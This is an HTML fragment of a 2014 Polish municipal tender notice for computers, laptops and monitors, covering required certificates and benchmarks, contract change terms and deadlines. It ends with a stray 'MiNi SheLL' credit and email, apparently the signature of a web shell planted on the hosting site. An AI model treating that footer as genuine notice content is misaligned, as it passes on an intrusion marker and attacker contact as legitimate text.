<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;"><P>(dokumenty te, a przede wszystkim wymagania zostały wyszczególnione i dodatkowo opisane w szczegółowym opisie przedmiotu zamówienia, który stanowi załącznik nr 7 do siwz):
<P>a)	w celu potwierdzenia wydajności komputera stacjonarnego:
<P>-	wydruk z przeprowadzonego testu (SYSmarkR 2012 PerformanceTest);
<P>-	wydruk raportu z oprogramowania testującego lub wydruk zawartości ekranu [Print Screen ekranu] z przeprowadzonych testów (PassMark PerformanceTest 8.0 64 Bit);
<P>-	wydruk raportu z oprogramowania testującego lub wydruk zawartości ekranu [Print Screen ekranu] z przeprowadzonych testów (PC Mark Vantage Professional 64-bit);
<P>b)	w celu potwierdzenia wymagań dotyczących pamięci operacyjnej RAM komputera stacjonarnego:
<P>-	wydruk raportu z oprogramowania testującego lub wydruk zawartości ekranu [Print Screen ekranu] z przeprowadzonych testów (PassMark PerformanceTest 8.0 64 Bit) (PC Mark Vantage Professional 64-bit wynik Memories Score);
<P>c)	w celu potwierdzenia wymagań dotyczących parametrów pamięci masowej komputera stacjonarnego:
<P>- wydruk raportu z oprogramowania testującego lub wydruk zawartości ekranu [Print Screen ekranu] z przeprowadzonych testów (PassMark PerformanceTest 8.0 64 Bit) (PC Mark Vantage Professional 64-bit);
<P>d)	w celu potwierdzenia wymagań dotyczących wydajności grafiki komputera stacjonarnego:
<P>-	wydruk raportu z oprogramowania testującego lub wydruk zawartości ekranu [Print Screen ekranu] z przeprowadzonych testów (PassMark PerformanceTest 8.0 64 Bit) (PC Mark Vantage Professional 64-bit);
<P>e)	w celu potwierdzenia wymagań dotyczących certyfikatów i standardów komputera stacjonarnego:
<P>-	Deklaracja zgodności CE;
<P>-	Potwierdzenie spełnienia kryteriów środowiskowych, w tym zgodności z dyrektywą RoHS Unii Europejskiej o eliminacji substancji niebezpiecznych w postaci oświadczenia producenta jednostki lub innego dokumentu potwierdzającego;
<P>-	certyfikat lub wydruk ze strony http://www.eu-energystar.org albo http://www.energystar.gov - komputer musi spełniać wymogi normy Energy Star 5.0;
<P>f)	w celu potwierdzenia wymagań dotyczących gwarancji komputera stacjonarnego:
<P>-	ISO 9001:2000 lub równoważne na świadczenie usług serwisowych oraz posiadać autoryzacje producenta komputera;
<P>g)	w celu potwierdzenia wymagań dotyczących gwarancji monitora:
<P>-	ISO 9001:2000 lub równoważne na świadczenie usług serwisowych oraz posiadać autoryzacje producenta komputera;
<P>h)	w celu potwierdzenia wymagań dotyczących certyfikatów monitora:
<P>-	TCO 6.0, ISO 13406-2 lub ISO 9241;
<P>-	Energy Star 6.0;
<P>i)	w celu potwierdzenia wydajności laptopa:
<P>-	wydruk raportu z oprogramowania testującego lub wydruk zawartości ekranu [Print Screen ekranu] z przeprowadzonych testów (Bapco MobileMark 2012 wynik Office Productivity Performance Qualification Rating);
<P>j)	w celu potwierdzenia wymagań dotyczących baterii i zasilania laptopa:
<P>-	wydruk raportu z oprogramowania testującego lub wydruk zawartości ekranu [Print Screen ekranu] z przeprowadzonych testów (Bapco MobileMark 2012 wynik Office Productivity Battery Life);
<P>k)	w celu potwierdzenia wymagań dotyczących certyfikatów laptopa:
<P>-	Deklaracja zgodności CE;
<P>-	Potwierdzenie spełnienia kryteriów środowiskowych, w tym zgodności z dyrektywą RoHS Unii Europejskiej o eliminacji substancji niebezpiecznych w postaci oświadczenia producenta jednostki lub innego dokumentu potwierdzającego;
<P>-	Certyfikat EnergyStar min. 5.0 - do oferty należy załączyć certyfikat albo wydruk ze strony www.energystar.gov lub http://www.eu-energystar.org;
<P>l)	w celu potwierdzenia wymagań dotyczących ergonomii laptopa:
<P>-	raport badawczy wystawiony przez polską, niezależną, akredytowaną jednostkę;
<P>m)	w celu potwierdzenia wymagań dotyczących gwarancji laptopa:
<P>-	ISO 9001:2000 lub równoważne na świadczenie usług serwisowych oraz posiadać autoryzacje producenta komputera.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p><P>1.	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
<P>2.	Jeżeli wykonawca, wykazując spełnianie warunków, o których mowa w pkt III.3) ogłoszenia, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp, zamawiający, w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, żąda dokumentów dotyczących w szczególności:
<P>a)	zakresu dostępnych wykonawcy zasobów innego podmiotu,
<P>b)	sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia,
<P>c)	charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem,
<P>d)	zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.
<P>W sytuacji gdy przedmiotem udzielenia są zasoby nierozerwalnie związane z podmiotem ich udzielającym, niemożliwe do samodzielnego obrotu i dalszego udzielania ich bez zaangażowania tego podmiotu w wykonanie zamówienia taki dokument musi zawierać wyraźne nawiązanie do uczestnictwa tego podmiotu w wykonaniu zamówienia.
<P>3.	W przypadku gdy wykonawca powołuje się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w pkt III.3.5) ogłoszenia, na zasoby innych podmiotów, musi zaistnieć stosowna sytuacja, w świetle której tego rodzaju udostępnienie będzie miało wymiar realny. Zamawiający zatem może zażądać m.in. deklaracji o solidarnej odpowiedzialności podmiotu trzeciego wraz z wykonawcą za wykonanie przedmiotu zamówienia. 
<P>W szczególności udostępnienie wskaźników ekonomicznych podmiotu trzeciego (w tym przypadku opłaconej polisy) nie będzie uznane za spełnienie warunków udziału w postępowaniu, w przypadku gdy ich udostępnienie nie będzie miało realnego wymiaru, gdyż są to dane nierozerwalnie związane z konkretnym podmiotem.
<P>4.	Upoważnienie dla osoby lub osób podpisujących ofertę musi bezpośrednio wynikać z dokumentów załączonych do oferty. W przypadku gdy ofertę podpisuje osoba lub osoby, których upoważnienie do reprezentacji nie wynika z dokumentów załączonych do oferty, wymaga się, aby wykonawca dołączył do oferty stosowne pełnomocnictwo. Pełnomocnictwo załączone do oferty winno być złożone w oryginale lub notarialnie poświadczonej kopii.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p><P>1.	Przewiduje się możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podanych warunków ich wprowadzenia:
<P>1)	dopuszcza się zmianę któregokolwiek z terminów realizacji umowy, o których mowa w § 4 umowy, jeżeli konieczność ich zmiany będzie spowodowana przyczynami niezależnymi od zamawiającego oraz od wykonawcy, w tym w szczególności:
<P>a)	niezależnymi od stron zakłóceniami systemów technicznych uniemożliwiające wykonywanie prac objętych umową,
<P>b)	nieprzewidzianymi przeszkodami o charakterze obiektywnym,
<P>c)	przypadkami siły wyższej, przy czym za siłę wyższą rozumie się zdarzenie o charakterze przypadkowym lub naturalnym (żywiołowym), nie do uniknięcia, takie, nad którym człowiek nie panuje;
<P>oraz każda ze stron w terminie 3 dni od zaistnienia tych przyczyn powiadomi drugą stronę o ich zaistnieniu
<P>2)	dopuszcza się zmianę typu urządzeń stanowiących przedmiot umowy, w przypadku:
<P>a)	wprowadzenia na rynek zmodyfikowanego lub udoskonalonego urządzenia o parametrach równych lub wyższych w stosunku do określonych w ofercie wykonawcy - przy zachowaniu zaoferowanych cen, co wykonawca zamawiającemu udokumentuje.
<P>b)	wycofania z produkcji lub dystrybucji oferowanego sprzętu i zaproponowanie innego - przy zachowaniu parametrów technicznych i funkcjonalnych nie gorszych niż urządzeń przyjętych do oferty, przy zachowaniu zaoferowanych cen, terminu wykonania i innych warunków udzielenia zamówienia zawartych w siwz. Wykonawca udokumentuje zamawiającemu, iż zaoferowany sprzęt został wycofany z produkcji lub dystrybucji.
<P>3)	dopuszcza się zmianę umowy w zakresie, w jakim ma na jej realizację wpływ zmiana powszechnie obowiązujących przepisów prawa - w terminie i stopniu odpowiadającym tym zmianom.
<P>4)	dopuszcza się zmianę gospodarstwa domowego mającego być beneficjentem ostatecznym
<P>2.	Określając warunki dokonania zmiany Umowy, sporządza się protokół konieczności, biorąc pod uwagę w szczególności: 
<P>1)	opis zmiany, 
<P>2)	uzasadnienie zmiany, 
<P>3)	czas dokonania zmiany, 
<P>4)	wpływ zmiany na terminy i sposób realizacji Umowy. 
<P>3.	W przypadku zmiany wysokości stawki podatku VAT, zamawiający zapłaci wykonawcy wynagrodzenie netto uwzględniające aktualnie obowiązującą stawkę podatku VAT, za prace wykonane i zafakturowane po dniu, w którym nowa stawka podatku VAT została wprowadzona.
<P>4. Szczegółowo informacje dotyczące zmian umowy zawarte są we wzorze umowy stanowiącej załącznik do siwz.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.radziejowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Radziejowicach, ul. Kubickiego 10.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.10.2014 godzina 11:45, miejsce: Sekretariat Urzędu Gminy w Radziejowicach, ul. Kubickiego 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Na realizację niniejszego zamówienia Gmina Radziejowice otrzymała dofinansowanie ze środków Unii Europejskiej w ramach Programu Operacyjnego Innowacyjna Gospodarka 2007-2013, w ramach działania 8.3. Przeciwdziałanie wykluczeniu cyfrowemu - eInclusion osi priorytetowej 8. Społeczeństwo informacyjne - zwiększanie innowacyjności gospodarki, tytuł Projektu: Likwidacja barier wykluczenia cyfrowego na obszarze Gminy Radziejowice.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com